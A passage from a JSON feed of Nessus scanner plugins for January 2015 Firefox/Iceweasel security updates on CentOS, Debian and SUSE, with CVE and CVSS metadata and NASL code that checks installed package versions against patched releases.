Firefox's spell checker is now correctly\nset to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 31.4.0 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020873.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4eefc3a1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020875.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6664375\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020876.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?191ba3f2\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020877.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?62a34e7e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or xulrunner packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8634\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"firefox-31.4.0-1.el5.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"firefox-31.4.0-1.el6.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"firefox-31.4.0-1.el7.centos\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"xulrunner-31.4.0-1.el7.centos\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"xulrunner-devel-31.4.0-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / xulrunner / xulrunner-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:55", "description": "Multiple security issues have been found in Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory safety errors and implementation errors may lead to the execution of arbitrary code, information leaks or denial of service.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "Debian DSA-3127-1 : iceweasel - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:iceweasel", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3127.NASL", "href": "https://www.tenable.com/plugins/nessus/80528", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3127. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80528);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_bugtraq_id(72044);\n script_xref(name:\"DSA\", value:\"3127\");\n\n script_name(english:\"Debian DSA-3127-1 : iceweasel - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors and implementation errors may lead to the execution of\narbitrary code, information leaks or denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/iceweasel\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3127\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the iceweasel packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 31.4.0esr-1~deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceweasel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dbg\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dev\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ach\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-af\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-all\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-an\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ar\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-as\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ast\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-be\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bg\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-br\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bs\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ca\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cs\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-csb\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cy\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-da\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-de\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-el\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eo\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-et\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eu\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fa\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ff\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fi\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fr\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gd\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-he\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hr\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hu\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-id\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-is\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-it\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ja\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kk\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-km\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kn\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ko\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ku\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lij\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lt\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lv\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mai\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mk\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ml\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mr\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ms\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-or\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-rm\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ro\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ru\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-si\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sk\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sl\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-son\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sq\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sr\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ta\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-te\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-th\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-tr\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-uk\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-vi\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-xh\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zu\", reference:\"31.4.0esr-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-05T14:37:54", "description": "This update fixes the following security issues in MozillaFirefox :\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 (bmo#1109889, bmo#1111737, bmo#1026774, bmo#1027300, bmo#1054538, bmo#1067473, bmo#1070962, bmo#1072130, bmo#1072871, bmo#1098583) Miscellaneous memory safety hazards (rv:35.0 / rv:31.4)\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy Authenticate responses\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\nAlso Mozilla NSS was updated to 3.17.3 to fix :\n\n - The QuickDER decoder now decodes lengths robustly (bmo#1064670/CVE-2014-1569)\n\n - Support for TLS_FALLBACK_SCSV has been added to the ssltap and tstclnt utilities\n\n - Changes in CA certificates\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : MozillaFirefox (SUSE-SU-2015:0076-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1569", "CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:libfreebl3", "p-cpe:/a:novell:suse_linux:libfreebl3-debuginfo", "p-cpe:/a:novell:suse_linux:libfreebl3-hmac", "p-cpe:/a:novell:suse_linux:libsoftokn3", "p-cpe:/a:novell:suse_linux:libsoftokn3-debuginfo", "p-cpe:/a:novell:suse_linux:libsoftokn3-hmac", "p-cpe:/a:novell:suse_linux:mozilla-nss", "p-cpe:/a:novell:suse_linux:mozilla-nss-certs", "p-cpe:/a:novell:suse_linux:mozilla-nss-certs-debuginfo", "p-cpe:/a:novell:suse_linux:mozilla-nss-debuginfo", "p-cpe:/a:novell:suse_linux:mozilla-nss-debugsource", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2015-0076-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0076-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83666);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_bugtraq_id(71675, 72044, 72046, 72047, 72049, 72050);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : MozillaFirefox (SUSE-SU-2015:0076-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues in MozillaFirefox :\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 (bmo#1109889,\n bmo#1111737, bmo#1026774, bmo#1027300, bmo#1054538,\n bmo#1067473, bmo#1070962, bmo#1072130, bmo#1072871,\n bmo#1098583) Miscellaneous memory safety hazards\n (rv:35.0 / rv:31.4)\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon\n requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie\n injection through Proxy Authenticate responses\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free\n in WebRTC\n\nAlso Mozilla NSS was updated to 3.17.3 to fix :\n\n - The QuickDER decoder now decodes lengths robustly\n (bmo#1064670/CVE-2014-1569)\n\n - Support for TLS_FALLBACK_SCSV has been added to the\n ssltap and tstclnt utilities\n\n - Changes in CA certificates\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-1569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8635/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8638/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8639/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8641/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150076-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5f1bf06b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-26\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-26\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-26\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3-hmac\");\n script_set_attribute(attribute:\"cpe\", 